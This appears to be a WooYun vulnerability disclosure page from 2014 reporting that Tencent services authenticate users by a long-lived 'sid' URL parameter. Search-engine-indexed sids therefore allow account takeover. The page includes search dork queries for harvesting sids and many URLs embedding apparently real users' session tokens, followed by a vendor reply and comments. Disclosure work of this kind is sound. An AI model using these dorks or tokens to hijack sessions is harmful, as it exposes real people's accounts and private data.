当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081109

漏洞标题:腾讯某业务逻辑控制不严可导致用户在不知情的情况下账号被盗(影响聊天、空间、微博、邮箱等全线业务)

相关厂商:腾讯

漏洞作者: 临时工

提交时间:2014-10-28 18:41

修复时间:2014-12-12 18:42

公开时间:2014-12-12 18:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-28: 细节已通知厂商并且等待厂商处理中
2014-10-29: 厂商已经确认,细节仅向厂商公开
2014-11-08: 细节向核心白帽子及相关领域专家公开
2014-11-18: 细节向普通白帽子公开
2014-11-28: 细节向实习白帽子公开
2014-12-12: 细节向公众公开

简要描述:

有N多成功实例可证明危害性

详细说明:

1.问题起因,sid这个参数,腾讯很多业务都使用sid单个参数做用户识别,然后还都是get请求,这种模式对于现在的网络安全环境来说,有点2了,而且请求过程也都是非加密的,抓取到通信即可获取,sid的有效期我发现也特别长,即使同一QQ生成多组sid也均会有效,那么下面问题来了?
举个例子:(例子来自于搜索引擎抓取到的sid,无需密码即可使用全线业务,真变态,原来还真不知道)
site:vip.qq.com inurl:sid=

b1.jpg


site:qq.com inurl:card/index inurl:sid=
site:mc.vip.qq.com inurl:sid=

a1.jpg


a2.jpg


site:qq.com inurl:sid=A

c.jpg


还有很多搜索方法,搜索引擎很给力吖
有效的sid是24位,都是A开头的,可以从搜索引擎里找到相当一部分有效的。
而且搜索引擎抓取的时间都是几个月前,那也就是说sid的有效时间很长,
但是有个情况,就是我带着搜索到的sid访问一些业务之后,突然会失效,
但是隔了几天或者很长时间,sid又有效了,很奇怪,不然早提交上来了,等着sid都有效。

漏洞证明:

2.qq业务列表:(下面的sid均来自搜索引擎,当你测试的时候不见的都有效)
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0

1.jpg


http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=ASgc4S73J9ioV2max7BYk_jq
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVlYOq9Gr9WXTQx-o0BCH_4e
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVbMZcf6i0b6L7udTckv3-gE
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AfstupcmnyfABb-D0gSjTK9r
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AUUvPjFYfHvhFs0UFc88gbCq
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=ARK7Ydu40t21Ytd7wHKvcpiH
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVApzk2ozFT9naJlAaTY1BGl
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AWR_cLCYmi2TBN6jpxry44pc
......
qq空间:
http://ish.z.qq.com/infocenter_v2.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0

2.jpg


qq微博:可以强加关注了
http://tapp.3g.qq.com/g/s?g_f=4719&g_ut=2&aid=h&sid=AcaYiNOTAAwj-34Gt1wL8Jc0&coid=qzone

2.1.jpg


qq邮箱:尼玛吖,从来不知道还有这个邮箱入口
http://w.mail.qq.com/cgi-bin/today?sid=jOjed82ocilmASF1XcHT5vNw,4,zQEJ7KD-F&first=1&sid=AcaYiNOTAAwj-34Gt1wL8Jc0

3.jpg


qq家园触屏版:可以和好友聊天了
http://house60.3g.qq.com/touch/index.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0#house/friends/all

4.jpg


qq好友、群列表:上面触屏版好友不全,可这里面就多了,qq号在源码里
http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AcaYiNOTAAwj-34Gt1wL8Jc0#house/friends/all

5.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=ASgc4S73J9ioV2max7BYk_jq

6.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AcaYiNOTAAwj-34Gt1wL8Jc0

7.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVlYOq9Gr9WXTQx-o0BCH_4e

8.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVbMZcf6i0b6L7udTckv3-gE

9.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AfstupcmnyfABb-D0gSjTK9r

10.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AUUvPjFYfHvhFs0UFc88gbCq

11.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=ARK7Ydu40t21Ytd7wHKvcpiH

12.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVApzk2ozFT9naJlAaTY1BGl

13.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AWR_cLCYmi2TBN6jpxry44pc
......还有很多其他业务,我想QQ主人自己都不知道账号已失窃

修复方案:

肯定懂得修复,就看你们想怎么处理了

版权声明:转载请注明来源 临时工@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-10-29 16:16

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-29 16:41 | 小薇2013 ( 实习白帽子 | Rank:32 漏洞数:5 | 我就看看我不说话!)

    这么叼为什么才5

  2. 2014-10-29 17:04 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    这么叼为什么才5

  3. 2014-10-29 17:13 | 临时工 ( 普通白帽子 | Rank:122 漏洞数:11 | 初来乍到)

    这么叼为什么才5

  4. 2014-10-29 17:31 | 风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)

    这么叼为什么才5

  5. 2014-10-29 17:49 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    应该是某个登录接口不会让已经登录的QQ掉线。你信吗?

  6. 2014-10-29 18:07 | 临时工 ( 普通白帽子 | Rank:122 漏洞数:11 | 初来乍到)

    我感觉中危还是可以的,有些用户还是可以影响到的

  7. 2014-10-29 19:02 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    这么叼为什么才5

  8. 2014-11-02 12:13 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    估计又会精

  9. 2014-11-28 16:24 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    这么叼为什么才5 ......善于发现周围细微的事务,洞主不错

  10. 2014-11-28 16:32 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @@ 怎么还都能访问

  11. 2014-12-12 19:17 | thatqier ( 路人 | Rank:6 漏洞数:7 | 小白一个)

    这么叼为什么才5

  12. 2014-12-12 20:48 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    这么叼为什么才5

  13. 2014-12-12 21:32 | 中国公民 ( 路人 | Rank:25 漏洞数:12 | 脱裤不提交,提交不脱裤)

    这么叼为什么才5

  14. 2014-12-12 21:53 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    这么叼为什么才5

  15. 2014-12-12 21:53 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    因为是临时工干的,哈哈

  16. 2014-12-12 21:55 | 月光光 ( 路人 | Rank:0 漏洞数:1 | 光光光光~)

    我累个擦 才5rank

  17. 2014-12-13 01:01 | evil ( 实习白帽子 | Rank:41 漏洞数:21 )

    这么叼为什么才5

  18. 2014-12-13 03:29 | V-King ( 实习白帽子 | Rank:31 漏洞数:7 | 我是静静)

    这么叼为什么才5

  19. 2014-12-13 17:24 | 斯杰 ( 路人 | Rank:10 漏洞数:5 | By:S丶jer)

    这么叼为什么才5

  20. 2015-06-04 18:49 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    破队形,因为洞主和其他黑客都在不断的访问这些搜索结果导致sid不断被保留,类似于xss平台里面的keep session